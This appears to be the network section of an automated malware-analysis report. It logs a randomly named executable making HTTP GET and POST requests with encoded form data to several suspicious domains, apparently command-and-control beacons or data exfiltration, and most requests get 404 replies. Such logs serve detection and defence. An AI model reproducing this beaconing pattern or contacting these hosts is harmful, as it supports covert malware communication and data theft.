                                                                Dec 10, 2024 12:20:50.773567915 CET1.1.1.1192.168.2.40xb4b3No error (0)www.egyshare.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 12:20:50.773567915 CET1.1.1.1192.168.2.40xb4b3No error (0)www.egyshare.xyz76.223.54.146A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.1secondlending.one
                                                                • www.logidant.xyz
                                                                • www.wcq77.top
                                                                • www.mindfulmo.life
                                                                • www.bienmaigrir.info
                                                                • www.exitomagnetico.online
                                                                • www.bcg.services
                                                                • www.mffnow.info
                                                                • www.remedies.pro
                                                                • www.caj-bioteaque.online
                                                                • www.qqa79.top
                                                                • www.egyshare.xyz

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973643.205.198.29804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:17:41.686014891 CET459OUTGET /alo6/?pFYX4n=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.1secondlending.one
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:17:43.154474020 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:17:42 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.44975445.141.156.114804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:17:58.851478100 CET717OUTPOST /ctvu/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.logidant.xyz
                                                                Origin: http://www.logidant.xyz
                                                                Referer: http://www.logidant.xyz/ctvu/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 36 32 53 54 37 57 34 47 55 64 56 76 7a 44 56 46 78 71 42 4d 64 47 41 6c 70 67 70 76 63 51 52 38 78 68 67 6a 62 57 74 37 38 56 70 44 36 68 52 42 65 41 32 47 61 39 6c 64 71 75 6b 62 79 47 5a 4b 51 64 6b 6e 6f 7a 78 54 49 32 36 65 69 43 41 39 68 64 46 77 58 4a 35 52 73 66 4d 45 74 33 77 38 75 6f 74 48 34 44 49 44 62 6d 52 59 44 48 48 70 77 5a 41 44 51 66 52 42 57 57 62 4a 41 33 4c 33 49 66 36 4e 6f 62 51 72 47 41 4f 45 6a 73 43 33 4a 32 72 30 53 4a 6c 74 43 4f 76 56 67 41 54 39 45 65 6c 59 56 34 58 71 72 58 46 68 77 74 6b 4f 48 75 2f 50 47 2b 46 63 78 4f 66 49 68 69 7a 4f 57 51 3d 3d
                                                                Data Ascii: pFYX4n=62ST7W4GUdVvzDVFxqBMdGAlpgpvcQR8xhgjbWt78VpD6hRBeA2Ga9ldqukbyGZKQdknozxTI26eiCA9hdFwXJ5RsfMEt3w8uotH4DIDbmRYDHHpwZADQfRBWWbJA3L3If6NobQrGAOEjsC3J2r0SJltCOvVgAT9EelYV4XqrXFhwtkOHu/PG+FcxOfIhizOWQ==
                                                                Dec 10, 2024 12:18:00.164731979 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:17:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.44976045.141.156.114804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:01.514180899 CET737OUTPOST /ctvu/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.logidant.xyz
                                                                Origin: http://www.logidant.xyz
                                                                Referer: http://www.logidant.xyz/ctvu/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 36 32 53 54 37 57 34 47 55 64 56 76 79 69 6c 46 7a 4c 42 4d 4d 32 41 69 71 67 70 76 54 77 52 77 78 68 63 6a 62 53 31 72 38 44 35 44 36 44 5a 42 64 46 43 47 62 39 6c 64 79 2b 6b 61 38 6d 5a 52 51 64 6f 76 6f 79 4e 54 49 32 75 65 69 43 77 39 68 50 74 7a 57 5a 35 54 6c 2f 4d 43 70 33 77 38 75 6f 74 48 34 44 63 70 62 6d 4a 59 43 33 33 70 69 4c 6f 41 54 66 52 43 58 57 62 4a 52 6e 4b 2b 49 66 36 6a 6f 66 52 32 47 47 4b 45 6a 74 79 33 49 6e 72 33 59 4a 6b 6d 66 65 75 65 70 53 2b 78 43 4d 77 34 63 70 37 46 72 7a 52 36 34 4c 70 55 57 66 65 59 55 2b 68 76 73 4a 57 38 73 68 4f 48 4e 57 5a 2f 4a 67 69 2f 76 6d 6b 76 70 59 49 6c 30 44 2b 4f 47 6a 4d 3d
                                                                Data Ascii: pFYX4n=62ST7W4GUdVvyilFzLBMM2AiqgpvTwRwxhcjbS1r8D5D6DZBdFCGb9ldy+ka8mZRQdovoyNTI2ueiCw9hPtzWZ5Tl/MCp3w8uotH4DcpbmJYC33piLoATfRCXWbJRnK+If6jofR2GGKEjty3Inr3YJkmfeuepS+xCMw4cp7FrzR64LpUWfeYU+hvsJW8shOHNWZ/Jgi/vmkvpYIl0D+OGjM=
                                                                Dec 10, 2024 12:18:02.811902046 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:02 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.44976645.141.156.114804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:04.183579922 CET10819OUTPOST /ctvu/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.logidant.xyz
                                                                Origin: http://www.logidant.xyz
                                                                Referer: http://www.logidant.xyz/ctvu/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 36 32 53 54 37 57 34 47 55 64 56 76 79 69 6c 46 7a 4c 42 4d 4d 32 41 69 71 67 70 76 54 77 52 77 78 68 63 6a 62 53 31 72 38 44 78 44 36 32 56 42 65 69 65 47 4b 4e 6c 64 73 75 6b 48 38 6d 5a 63 51 64 77 6a 6f 79 42 70 49 31 57 65 6b 51 34 39 30 4f 74 7a 66 5a 35 54 36 76 4d 44 74 33 78 6d 75 6f 38 41 34 44 4d 70 62 6d 4a 59 43 31 76 70 68 5a 41 41 56 66 52 42 57 57 62 56 41 33 4c 62 49 66 79 56 6f 66 63 42 48 33 32 45 6a 4e 69 33 46 31 44 33 46 5a 6b 6b 63 65 76 65 70 53 7a 7a 43 4d 73 4b 63 70 2f 76 72 30 35 36 37 74 73 30 48 62 53 63 58 34 78 79 34 59 71 38 73 68 71 32 55 78 52 63 46 54 69 52 37 6c 6f 38 69 37 78 41 74 57 6d 47 62 44 4e 64 78 56 62 4e 64 69 6a 67 62 30 56 66 64 33 73 4e 62 4a 79 4e 73 34 63 4f 6a 33 74 77 75 6e 43 78 6e 77 6f 70 44 56 2f 72 51 31 2b 31 56 6e 4c 76 48 46 6d 37 47 36 48 4a 4e 4d 2f 57 48 46 61 4c 77 54 4b 74 4a 6e 7a 65 71 6e 73 70 7a 36 64 75 66 68 4a 30 71 4b 58 30 48 66 71 52 61 67 36 59 6c 58 4b 64 4f 47 44 6d 55 37 79 70 6f 6f 6e 36 6f 7a 56 [TRUNCATED]
                                                                Data Ascii: pFYX4n=62ST7W4GUdVvyilFzLBMM2AiqgpvTwRwxhcjbS1r8DxD62VBeieGKNldsukH8mZcQdwjoyBpI1WekQ490OtzfZ5T6vMDt3xmuo8A4DMpbmJYC1vphZAAVfRBWWbVA3LbIfyVofcBH32EjNi3F1D3FZkkcevepSzzCMsKcp/vr0567ts0HbScX4xy4Yq8shq2UxRcFTiR7lo8i7xAtWmGbDNdxVbNdijgb0Vfd3sNbJyNs4cOj3twunCxnwopDV/rQ1+1VnLvHFm7G6HJNM/WHFaLwTKtJnzeqnspz6dufhJ0qKX0HfqRag6YlXKdOGDmU7ypoon6ozVwr2b+rMGre8ET14LaCxVLkBvFJSYMB7rhCyFizS7iM0UiJneItxN7cr3YOLJyl/8CPuDM6bNZyVuEeDZZKbOOwa3FqjZ4sZwo/OzsRMUtre44dMeFRCqnSwmUynyW137G4u3POoIYa10UIkhOX4THIJ7vTcbDIwgK6F8alOVFnNsukvE3ZJzBm/8BKHfsIRJlPb0UqjVYlA3EPO4eQxlwrFOJiW+QpsyFTib0XdY4LPk4WcLEZYqFmqnF99qleNy/8hva7FZNoxDoZ/QvVCHZ4QsWzhR1wB9MbuSf9ip1U+3vNHpOtBAkxUwlEzSsUdfp3D+BOGSVqt80lLFRY8r6CMKCq/vjQ8qDIYb4F2HPiUIQDg70Q3zI6rsIMr6WKRJsocUXcTI17YIizQoBapsaJMWq3fUvzpd8IeJkzSmfh7V/F3oRTaYWfLXFW+gk/NhP16UBVuLvbxHAy74XAjf5A6SNmfu6rO3YAg1x2BQGc269kgN5t1rrIXFX9q3dC6PkgtoM0lzZTdqwDKwWG0QyCIQyy8a8oxwAOdoPxEOWIKMRcG6k6grghrJMpzgSzJDpFNXix1rn3JWMiPDNtkutY3xcO6hoO4vE06MYMfjJG9uqFnU75mtbLGGhVP6PvH92r75Py3XMmn7LeZkt0Wga20ScwqohpFEk5 [TRUNCATED]
                                                                Dec 10, 2024 12:18:05.497869015 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:05 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.44977645.141.156.114804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:06.857856989 CET453OUTGET /ctvu/?pFYX4n=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.logidant.xyz
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:18:08.139552116 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:07 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449792154.23.184.194804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:13.889539003 CET708OUTPOST /bryf/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.wcq77.top
                                                                Origin: http://www.wcq77.top
                                                                Referer: http://www.wcq77.top/bryf/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 50 43 78 44 55 6d 72 38 45 76 69 67 52 79 70 6d 72 52 78 47 6a 43 4d 45 33 67 49 6a 64 2f 72 50 4e 50 41 74 2f 71 66 4e 74 74 77 63 6a 31 36 78 31 57 72 72 39 54 34 4b 65 69 53 79 41 30 30 37 79 31 68 70 72 42 52 34 5a 42 79 52 64 70 63 74 66 72 48 36 51 34 2f 41 36 7a 6a 31 35 55 56 4a 6d 69 2b 65 42 35 6c 44 38 6c 42 30 6f 75 59 39 67 41 56 38 4f 64 73 63 32 78 39 4a 39 41 4e 77 76 74 39 44 39 61 6b 71 30 77 75 7a 7a 79 42 55 73 4d 5a 34 4b 34 75 32 78 2b 79 53 64 4f 31 75 68 4d 58 59 51 57 64 67 49 35 64 69 53 6e 59 32 73 6b 63 62 6e 68 72 57 75 4a 78 58 32 2b 51 38 74 41 3d 3d
                                                                Data Ascii: pFYX4n=PCxDUmr8EvigRypmrRxGjCME3gIjd/rPNPAt/qfNttwcj16x1Wrr9T4KeiSyA007y1hprBR4ZByRdpctfrH6Q4/A6zj15UVJmi+eB5lD8lB0ouY9gAV8Odsc2x9J9ANwvt9D9akq0wuzzyBUsMZ4K4u2x+ySdO1uhMXYQWdgI5diSnY2skcbnhrWuJxX2+Q8tA==
                                                                Dec 10, 2024 12:18:15.362895012 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7b148-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449799154.23.184.194804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:16.558583021 CET728OUTPOST /bryf/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.wcq77.top
                                                                Origin: http://www.wcq77.top
                                                                Referer: http://www.wcq77.top/bryf/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 50 43 78 44 55 6d 72 38 45 76 69 67 44 48 35 6d 70 77 78 47 69 69 4d 4c 37 41 49 6a 45 76 72 54 4e 50 4d 74 2f 76 76 64 74 66 6b 63 74 33 69 78 30 58 72 72 2b 54 34 4b 56 43 53 33 45 30 30 67 79 31 64 48 72 42 74 34 5a 42 6d 52 64 6f 73 74 63 59 76 35 51 6f 2f 43 79 54 6a 7a 30 30 56 4a 6d 69 2b 65 42 35 78 70 38 6c 4a 30 6f 39 51 39 67 69 39 2f 41 39 73 66 67 42 39 4a 35 41 4e 38 76 74 39 6c 39 62 4a 4e 30 79 57 7a 7a 33 39 55 73 39 5a 33 54 49 75 30 73 4f 7a 43 4d 66 63 6a 67 39 69 6e 65 77 46 7a 42 64 4e 42 54 68 56 73 39 56 39 4d 31 68 50 6c 7a 4f 34 6a 37 39 74 31 32 45 79 48 49 58 70 71 65 45 4b 71 36 78 74 4f 39 68 33 78 79 72 30 3d
                                                                Data Ascii: pFYX4n=PCxDUmr8EvigDH5mpwxGiiML7AIjEvrTNPMt/vvdtfkct3ix0Xrr+T4KVCS3E00gy1dHrBt4ZBmRdostcYv5Qo/CyTjz00VJmi+eB5xp8lJ0o9Q9gi9/A9sfgB9J5AN8vt9l9bJN0yWzz39Us9Z3TIu0sOzCMfcjg9inewFzBdNBThVs9V9M1hPlzO4j79t12EyHIXpqeEKq6xtO9h3xyr0=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449805154.23.184.194804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:19.233438015 CET10810OUTPOST /bryf/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.wcq77.top
                                                                Origin: http://www.wcq77.top
                                                                Referer: http://www.wcq77.top/bryf/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 50 43 78 44 55 6d 72 38 45 76 69 67 44 48 35 6d 70 77 78 47 69 69 4d 4c 37 41 49 6a 45 76 72 54 4e 50 4d 74 2f 76 76 64 74 66 38 63 74 47 43 78 31 30 7a 72 2f 54 34 4b 4f 69 53 32 45 30 31 77 79 31 31 4c 72 42 68 43 5a 43 65 52 63 4b 6b 74 58 4a 76 35 62 6f 2f 43 77 54 6a 79 35 55 55 4c 6d 6d 69 61 42 35 68 70 38 6c 4a 30 6f 38 41 39 6d 77 56 2f 43 39 73 63 32 78 38 47 39 41 4d 72 76 74 6c 62 39 62 4d 36 30 42 65 7a 39 33 4e 55 38 66 78 33 61 49 75 71 76 4f 79 48 4d 66 42 6a 67 39 2f 55 65 77 5a 64 42 61 39 42 52 31 63 49 35 42 31 42 74 44 72 42 72 35 6b 62 38 64 70 58 2f 31 47 74 50 47 68 4d 64 51 53 33 69 68 35 46 71 45 71 31 75 63 55 48 71 50 70 70 77 62 5a 58 6a 67 41 76 54 73 38 2b 35 6f 6c 37 49 66 58 68 73 50 44 61 31 74 57 74 65 6f 2f 55 52 55 49 76 52 39 36 51 73 2f 51 5a 46 51 4e 4e 52 62 6f 79 38 6f 44 6c 71 6d 35 74 32 66 51 73 37 67 62 67 67 54 37 5a 77 62 79 39 6a 73 44 7a 48 76 77 6d 76 66 35 58 6a 57 64 6e 64 36 34 7a 67 71 4d 59 59 65 2f 2b 48 6b 71 5a 35 33 68 [TRUNCATED]
                                                                Data Ascii: pFYX4n=PCxDUmr8EvigDH5mpwxGiiML7AIjEvrTNPMt/vvdtf8ctGCx10zr/T4KOiS2E01wy11LrBhCZCeRcKktXJv5bo/CwTjy5UULmmiaB5hp8lJ0o8A9mwV/C9sc2x8G9AMrvtlb9bM60Bez93NU8fx3aIuqvOyHMfBjg9/UewZdBa9BR1cI5B1BtDrBr5kb8dpX/1GtPGhMdQS3ih5FqEq1ucUHqPppwbZXjgAvTs8+5ol7IfXhsPDa1tWteo/URUIvR96Qs/QZFQNNRboy8oDlqm5t2fQs7gbggT7Zwby9jsDzHvwmvf5XjWdnd64zgqMYYe/+HkqZ53h/vbvTTSr/fd/6OTcccy0x92IDbaYfvh9SjqE8RsZytrhveuniQxVq+egkh6WcvmuG2r21rsHPFPrp8RPj4tY5owrd2ylUaye63jydkPYOvrM/GugITcP+Apv7d9f2qYyWAukp8n8bxL61aHaVSfGTPUtC56KTwYaBp2iPiWC8yDzVzTMkGEhr69jjUsL/Wr4+rJ4yEqC7do12BJC0mulHkQTVihFdyrx3oVC48sbdzIak/Z6vQpy3atgK85DAqrBpmN+OCZb9ZFhXy4ijMSIgSOGYBd7QWCdifE3bsfByvWtJ9x++kX0uwx+iDD9ARQ6KgXQ5mCnrB1GEhpUxj10jYKiCh8kk+6+1rfNpqlWXhvm07bFCa7AsfGBHZqiRDKVzPqDnOabK3dGJ9Y+HOMCEUXrogecL/4f2tO5Anwv8VjBpH+/CH2vADjV553ZlDZ4F0E0G0G7kT6fw9stS/uvCmgs55xMAPdJ+6IBjSEKftZ2fXMaA+MgnaFE4pvwgrD5S5JuDrFqjrlag7ewyQplrYRKSzL3DEuA4DT/JS9G20Dx4RrJBiAITYMq+V5ohynKJgxNbZ87lNF2tMdgVhIvtw/KXun8IoHce0kihYmikChatDLMD2TIjyWgc2TNsMwZhGCIBoa9R3byZOj+kOKCwjBFQgbCqI5oLw [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.449815154.23.184.194804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:21.980484009 CET450OUTGET /bryf/?rr7x1=pT0pWliPV&pFYX4n=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.wcq77.top
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:18:23.437036991 CET312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:23 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7b148-94"
